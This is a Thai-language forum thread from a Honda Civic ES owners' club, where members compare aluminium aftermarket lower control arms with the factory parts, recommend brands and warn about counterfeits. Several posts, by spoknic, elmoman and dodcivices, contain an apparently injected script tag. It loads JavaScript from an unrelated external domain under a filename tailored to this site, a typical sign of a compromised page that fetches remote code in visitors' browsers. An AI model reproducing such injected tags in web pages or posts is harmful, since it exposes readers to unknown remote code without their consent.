ตอบ
Y u s Z a


เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 10:31 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
พอดีกำลังตัดสินใจจะใส่อยู่เลยอยาก ถามผู้ที่ใส่แล้วว่ามันแตกต่างจากของเดิมยังไงบ้าง นอกจากความสวย ช่วยเปรียบเทียบทีครับ

ปล.เอาเรื่องสมรรถนะการใช้งานนะครับ ขอบคุณครับ
ได้รับคำขอบคุณจาก: elmoman  amnuay  kantaphat  nooduean_69  nu_es_05  karnmotocross01 
jedsada777


ชื่อเล่น: เจษโคราช

เข้าร่วม: 30 กันยา 2008
ตอบ: 1012

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2839
ให้คำขอบคุณ: 1102

ที่อยู่: เจษโคราช Civic ES JDM Car
ปี: 2005
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 24 กุมภา 2010 10:51 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ได้ความเบามาครับ แต่ความแข็งแรง ไม่ได้หายไป แต่กลับได้มามากกว่าเดิม...(บางรุ่นนะ)

ควรเลือกพิจารณาก่อนตัดสินใจซื้อ ถึงวัสดุ คุณภาพที่ผลิต ด้วย เพราะขนาดปีกเหล็ก ก็ยังขาดกันมาแล้ว

ควรคำนึงถึงคุณภาพของชิ้นงานเป็นหลัก......เพราะเราเป็นคนซื้อ และเป็นคนใช้รถเอง
Y u s Z a


เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 11:02 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
jedsada777 พิมพ์ว่า:
ได้ความเบามาครับ แต่ความแข็งแรง ไม่ได้หายไป แต่กลับได้มามากกว่าเดิม...(บางรุ่นนะ)

ควรเลือกพิจารณาก่อนตัดสินใจซื้อ ถึงวัสดุ คุณภาพที่ผลิต ด้วย เพราะขนาดปีกเหล็ก ก็ยังขาดกันมาแล้ว

ควรคำนึงถึงคุณภาพของชิ้นงานเป็นหลัก......เพราะเราเป็นคนซื้อ และเป็นคนใช้รถเอง


พอแนะนำได้ไหมครับ ว่ายี่ห้อไหนดีไม่ดี ครับ
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
jedsada777


ชื่อเล่น: เจษโคราช

เข้าร่วม: 30 กันยา 2008
ตอบ: 1012

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2839
ให้คำขอบคุณ: 1102

ที่อยู่: เจษโคราช Civic ES JDM Car
ปี: 2005
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 24 กุมภา 2010 12:38 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
Y u s Z a พิมพ์ว่า:
jedsada777 พิมพ์ว่า:
ได้ความเบามาครับ แต่ความแข็งแรง ไม่ได้หายไป แต่กลับได้มามากกว่าเดิม...(บางรุ่นนะ)

ควรเลือกพิจารณาก่อนตัดสินใจซื้อ ถึงวัสดุ คุณภาพที่ผลิต ด้วย เพราะขนาดปีกเหล็ก ก็ยังขาดกันมาแล้ว

ควรคำนึงถึงคุณภาพของชิ้นงานเป็นหลัก......เพราะเราเป็นคนซื้อ และเป็นคนใช้รถเอง


พอแนะนำได้ไหมครับ ว่ายี่ห้อไหนดีไม่ดี ครับ



ตัดสินใจเอาเองเลยครับ ผมพูดมากไม่ได้ เหอะๆๆๆ
ได้รับคำขอบคุณจาก: Y u s Z a  kaorjang  es330  hacker  cisco  BOY_PeTiTe  jonatan  mark_es03  iMan  jacky19  nooduean_69  trucklinkin  nu_es_05  karnmotocross01 
spoknic


เข้าร่วม: 31 ธันวา 2008
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 254
ให้คำขอบคุณ: 53

ที่อยู่: สวรรค์ชั้น 7
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 24 กุมภา 2010 12:43 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
หาความรู้อยู่เหมือนกัน..

แต่ยังไม่ค่อยมั่นใจอ่ะ..

ว่าตัวไหนน่าจะพอคบได้ทั้งราคาและคุณภาพอ่ะ...




"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
elmoman


ชื่อเล่น: หนึ่ง ครับ

เข้าร่วม: 18 มีนา 2009
ตอบ: 185

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 232

ที่อยู่: นนทบุรี
ปี: 2005
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 24 กุมภา 2010 12:57 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
อยากรู้เหมือนกัน ครับบบบ
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
Turngkung P 11


ชื่อเล่น: เติ้ง

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1656

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2557
ให้คำขอบคุณ: 3623

ที่อยู่: SaPanMai
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 13:13 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ตามความเห็น

ถ้าเป็นผม ผมจะเลือกแบรนด์แรกๆ ๆ ที่เป็นคนเริ่มทำอ่ะ

หรือก้อดูยี่ห้อที่คนในคลับใช้กันเยอะๆ ๆ

แต่ที่จำได้ว่าใช้มานานแล้วววววววว ก้อมีรถพี่เอกอ่ะแระครับ อิอิ ยังอยู่ดี
ได้รับคำขอบคุณจาก: kaorjang  jonatan  iMan  SYS  witat  jacky19  karnmotocross01 
fff_1232


ชื่อเล่น: ต้น

เข้าร่วม: 01 ตุลา 2008
ตอบ: 708

Guru ES
Guru ES

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 1472

ที่อยู่: พระราม 2
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 24 กุมภา 2010 13:47 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ตัวเหม็น 2
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
elmoman


ชื่อเล่น: หนึ่ง ครับ

เข้าร่วม: 18 มีนา 2009
ตอบ: 185

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 232

ที่อยู่: นนทบุรี
ปี: 2005
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 24 กุมภา 2010 13:56 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
fff_1232 พิมพ์ว่า:
ตัวเหม็น 2


<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
autonice


ชื่อเล่น: ฝาย

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1124

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1322
ให้คำขอบคุณ: 32

ที่อยู่: The Gang Original Gangster !
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 24 กุมภา 2010 14:35 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
อยู่ ที่ ความ ชอบครับ...
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
dodcivices


ชื่อเล่น: โดด

เข้าร่วม: 30 กันยา 2009
ตอบ: 537

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 861
ให้คำขอบคุณ: 539

ที่อยู่: สมุทรปราการ
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 24 กุมภา 2010 14:36 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
fff_1232 พิมพ์ว่า:
ตัวเหม็น 2
<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
nilkung


ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

ที่อยู่: หัวหิน-ปราณบุรี
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 24 กุมภา 2010 15:15 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
และระวังของปลอมนะคร้าบ
ได้รับคำขอบคุณจาก: kaorjang  hacker  kittidech  karnmotocross01 
es330


เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 16:33 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ตัวเหม็น 2 ใช้ AL2024 aluminum เกรดเดียวกับใช้สำหรับเครื่องบิน แต่จริงๆแล้วขึ้นอยู่กับความชอบส่วนตัวและเงินในกระเป๋า ชอบตัวไหนก็จัดไปครับ
ได้รับคำขอบคุณจาก: amnuay  fff_1232  nilkung  curran  kaorjang  SYS  jacky19  karnmotocross01 
amnuay


เข้าร่วม: 16 พฤษภาคม 2009
ตอบ: 915

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 866
ให้คำขอบคุณ: 2043

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 24 กุมภา 2010 17:09 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
มาเก็บข้อมูล ขอบคุณคร้าบ
ได้รับคำขอบคุณจาก: karnmotocross01 
ES21_fatboy


เข้าร่วม: 01 ตุลา 2008
ตอบ: 1563

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11901
ให้คำขอบคุณ: 4229

ที่อยู่: วงแหวนอุตสาหกรรม
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 24 กุมภา 2010 17:13 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
โดยหลักแล้ว ปีกนกอลูมิเนียม(Lower control Arm) ที่ทำกันขึ้นมาเพื่อเปลี่ยนทดแทน

ของเดิมจากโรงงานนั้น จะมีความแข็งแรงมากกว่า และเบากว่า ทั้งนี้เพื่อลดการให้ตัว

ของล้อหลังยามเข้าโค้งด้วยความรุนแรง ทำให้เพิ่มความมั่นคงในการบังคับควบคุม

ส่วนความเบาจะมีผลต่อ นน.รวมของตัวรถ และลด นน.ใต้สปริงลง ช่วยให้การ

ตอบสนองของช่วงล่างฉับไวขึ้นเช่นเดียวกับการเปลี่ยน ไปใช้ล้อ Forged นน.เบา

นอกจากนี้ มักนิยมเจาะรูซึ่งนอกจากจะช่วยลด นน. เสริมความแข็งแรงแล้ว

ยังช่วยลดแรงต้านอากาศลงอีกด้วย


แก้ไขล่าสุดโดย เมื่อ พุธ, 24 กุมภา 2010 23:35, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
jedsada777


ชื่อเล่น: เจษโคราช

เข้าร่วม: 30 กันยา 2008
ตอบ: 1012

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2839
ให้คำขอบคุณ: 1102

ที่อยู่: เจษโคราช Civic ES JDM Car
ปี: 2005
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 24 กุมภา 2010 17:35 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ส่วนตัวผมตัดสินใจเลือกใช้ Skunk 2
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
xcyber


ชื่อเล่น: เอ็กซ์

เข้าร่วม: 30 ตุลา 2008
ตอบ: 1105

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1281
ให้คำขอบคุณ: 217

ที่อยู่: เจริญนคร
ปี: 2001
พุธ, 24 กุมภา 2010 17:50 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ES21_fatboy พิมพ์ว่า:
โดยหลักแล้ว ปีกนกอลูมิเนียม(Lower control Arm) ที่ ทำกันขึ้นมาเพื่อเปลี่ยนแทนของเดิมจากโรงงานนั้น

จะมีความแข็งแรงมากกว่า และเบากว่า ทั้งนี้เพื่อลดการให้ตัวของล้อหลังยามเข้าโค้งด้วยความรุนแรง ทำให

เพิ่มความมั่นคงในการบังคับควบคุม ส่วนความเบาจะมีผลต่อ นน.รวมของตัวรถ และลด นน.ใต้สปริงลง

ช่วยให้การตอบสนองของช่วงล่างฉับไวขึ้นเช่นเดียวกับการเปลี่ยน

ไปใช้ล้อ Forged นน.เบา นอกจากนี้ มักนิยมเจาะรซึ่งนกจากจะช่วยลด นน. เสริมความแข็งแรงแล้ว


ยังช่วยลดแรงต้านอากาศลงอีกด้วย


กระจ่างครับ
ได้รับคำขอบคุณจาก: hacker  kaorjang  iMan  karnmotocross01 
Y u s Z a


เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 18:11 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
jedsada777 พิมพ์ว่า:
ส่วนตัวผมตัดสินใจเลือกใช้ Skunk 2


อันนี้น่าสนใจที่สุดครับ คิดไว้เหมือนกันครับ
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
ake_es


ชื่อเล่น: เอก

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

ที่อยู่: ดอนเมือง
พุธ, 24 กุมภา 2010 18:19 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ES21_fatboy พิมพ์ว่า:
โดยหลักแล้ว ปีกนกอลูมิเนียม(Lower control Arm) ที่ ทำกันขึ้นมาเพื่อเปลี่ยนแทนของเดิมจากโรงงานนั้น

จะมีความแข็งแรงมากกว่า และเบากว่า ทั้งนี้เพื่อลดการให้ตัวของล้อหลังยามเข้าโค้งด้วยความรุนแรง ทำให

เพิ่มความมั่นคงในการบังคับควบคุม ส่วนความเบาจะมีผลต่อ นน.รวมของตัวรถ และลด นน.ใต้สปริงลง

ช่วยให้การตอบสนองของช่วงล่างฉับไวขึ้นเช่นเดียวกับการเปลี่ยน

ไปใช้ล้อ Forged นน.เบา นอกจากนี้ มักนิยมเจาะรซึ่งนกจากจะช่วยลด นน. เสริมความแข็งแรงแล้ว


ยังช่วยลดแรงต้านอากาศลงอีกด้วย
อย่างนี้นี่เอง..........
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
brunox


ชื่อเล่น: โอ

เข้าร่วม: 03 ธันวา 2009
ตอบ: 811

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 3182

ที่อยู่: Lak4
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 22:04 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ชัดเจนดีมากครับ

แต่มันแข็งแรงกว่าเหล็กจริงๆเหรอครับ
ได้รับคำขอบคุณจาก: kaorjang  karnmotocross01 
jumper


ชื่อเล่น: เหลียง

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 1413

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2168
ให้คำขอบคุณ: 1151

ที่อยู่: ปากน้ำ
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กุมภา 2010 22:26 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
เก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: Y u s Z a  karnmotocross01 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 25 กุมภา 2010 14:52 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ของผม K-spot ชอบสีอะครับ ตามสเปคแล้วเป็นอลูมิเนียมเกรดเดียวกันครับ

โปรดระวังของปลอมนะครับ
ได้รับคำขอบคุณจาก: kaorjang  kittidech  ES7613  curran  honeybeex7  jonatan  mark_es03  Y u s Z a  karnmotocross01 
FRANG_BCP


ชื่อเล่น: ข้าวฟร้าง

เข้าร่วม: 29 เมษา 2009
ตอบ: 849

Guru ES
Guru ES

ได้รับคำขอบคุณ: 749
ให้คำขอบคุณ: 2802

ที่อยู่: BANGP00 SAMUTPRAKAN
ศุกร์, 26 กุมภา 2010 07:46 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
jedsada777 พิมพ์ว่า:
ส่วนตัวผมตัดสินใจเลือกใช้ Skunk 2


+1 ครับ
ได้รับคำขอบคุณจาก: mark_es03  Y u s Z a  karnmotocross01 
sarayuth


เข้าร่วม: 22 พฤษภาคม 2009
ตอบ: 247

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 287

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 26 กุมภา 2010 09:38 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ขอบคุณครับ
ได้รับคำขอบคุณจาก: Y u s Z a  karnmotocross01 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 26 กุมภา 2010 10:26 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
สนใจมานาน K-SPORT ก็เยี่ยมแล้วใช่ไหมครับ
ได้รับคำขอบคุณจาก: Y u s Z a  karnmotocross01 
Y u s Z a


เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 26 กุมภา 2010 10:52 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
hacker พิมพ์ว่า:
ของผม K-spot ชอบสีอะครับ ตามสเปคแล้วเป็นอลูมิเนียมเกรดเดียวกันครับ

โปรดระวังของปลอมนะครับ



ราคาเท่าไหร่ครับ พอมีเบอร์ติดต่อซื้อของไหมคับ
ได้รับคำขอบคุณจาก: karnmotocross01 
saw


ชื่อเล่น: ซอ เพชรบุร

เข้าร่วม: 24 มกรา 2009
ตอบ: 2873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2127
ให้คำขอบคุณ: 2684

ที่อยู่: บ้านลาด เพชรบุรี รับพาเสียวทั่วเพชรบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 26 กุมภา 2010 12:18 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
Y u s Z a พิมพ์ว่า:
hacker พิมพ์ว่า:
ของผม K-spot ชอบสีอะครับ ตามสเปคแล้วเป็นอลูมิเนียมเกรดเดียวกันครับ

โปรดระวังของปลอมนะครับ



ราคาเท่าไหร่ครับ พอมีเบอร์ติดต่อซื้อของไหมคับ



ร้านพี่ใหม่ก็มีครับผม
ได้รับคำขอบคุณจาก: ronnachai  karnmotocross01 
armrkikun


เข้าร่วม: 04 มีนา 2009
ตอบ: 118

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 45
ให้คำขอบคุณ: 117

ปี: 2004
สี: เทา ซิกเนต (เมทัลลิก) (RP-31M)
ศุกร์, 26 กุมภา 2010 15:14 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
โปรเจ็คต่อไป รอปัจจัยเดียว..........กะตัง
ได้รับคำขอบคุณจาก: ronnachai  Y u s Z a  karnmotocross01 
kieng


ชื่อเล่น: เกี๊ยง

เข้าร่วม: 11 มกรา 2009
ตอบ: 343

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1144
ให้คำขอบคุณ: 347

ที่อยู่: New bridge
ปี: 2004
ศุกร์, 26 กุมภา 2010 21:28 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ES21_fatboy พิมพ์ว่า:
โดยหลักแล้ว ปีกนกอลูมิเนียม(Lower control Arm) ที่ทำกันขึ้นมาเพื่อเปลี่ยนทดแทน

ของเดิมจากโรงงานนั้น จะมีความแข็งแรงมากกว่า และเบากว่า ทั้งนี้เพื่อลดการให้ตัว

ของล้อหลังยามเข้าโค้งด้วยความรุนแรง ทำให้เพิ่มความมั่นคงในการบังคับควบคุม

ส่วนความเบาจะมีผลต่อ นน.รวมของตัวรถ และลด นน.ใต้สปริงลง ช่วยให้การ

ตอบสนองของช่วงล่างฉับไวขึ้นเช่นเดียวกับการเปลี่ยน ไปใช้ล้อ Forged นน.เบา

นอกจากนี้ มักนิยมเจาะรูซึ่งนอกจากจะช่วยลด นน. เสริมความแข็งแรงแล้ว

ยังช่วยลดแรงต้านอากาศลงอีกด้วย



ใช้แล้วรู้สึกเหมือนที่ พี่เอกว่าเหมือนกันนะ ทั้งที่ช่วงล่างก็เดิมๆ
ได้รับคำขอบคุณจาก: ronnachai  curran  mark_es03  Y u s Z a  karnmotocross01 
gozzilla


เข้าร่วม: 18 ตุลา 2009
ตอบ: 256

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 222

ที่อยู่: พัทยานะ...
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
เสาร์, 27 กุมภา 2010 00:00 - ปีกนก อลูมิเนียม กับ ของเดิม แตกต่างยังไงครับ เปรียบเทียบข้อดี-ข้อเสียหน่อยครับ
ES21_fatboy พิมพ์ว่า:
โดยหลักแล้ว ปีกนกอลูมิเนียม(Lower control Arm) ที่ทำกันขึ้นมาเพื่อเปลี่ยนทดแทน

ของเดิมจากโรงงานนั้น จะมีความแข็งแรงมากกว่า และเบากว่า ทั้งนี้เพื่อลดการให้ตัว

ของล้อหลังยามเข้าโค้งด้วยความรุนแรง ทำให้เพิ่มความมั่นคงในการบังคับควบคุม

ส่วนความเบาจะมีผลต่อ นน.รวมของตัวรถ และลด นน.ใต้สปริงลง ช่วยให้การ

ตอบสนองของช่วงล่างฉับไวขึ้นเช่นเดียวกับการเปลี่ยน ไปใช้ล้อ Forged นน.เบา

นอกจากนี้ มักนิยมเจาะรูซึ่งนอกจากจะช่วยลด นน. เสริมความแข็งแรงแล้ว

ยังช่วยลดแรงต้านอากาศลงอีกด้วย


อืม...ข้อมูลแจ่มกระจ่างคลายร้อนเลยคับผม
ได้รับคำขอบคุณจาก: Y u s Z a  karnmotocross01 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.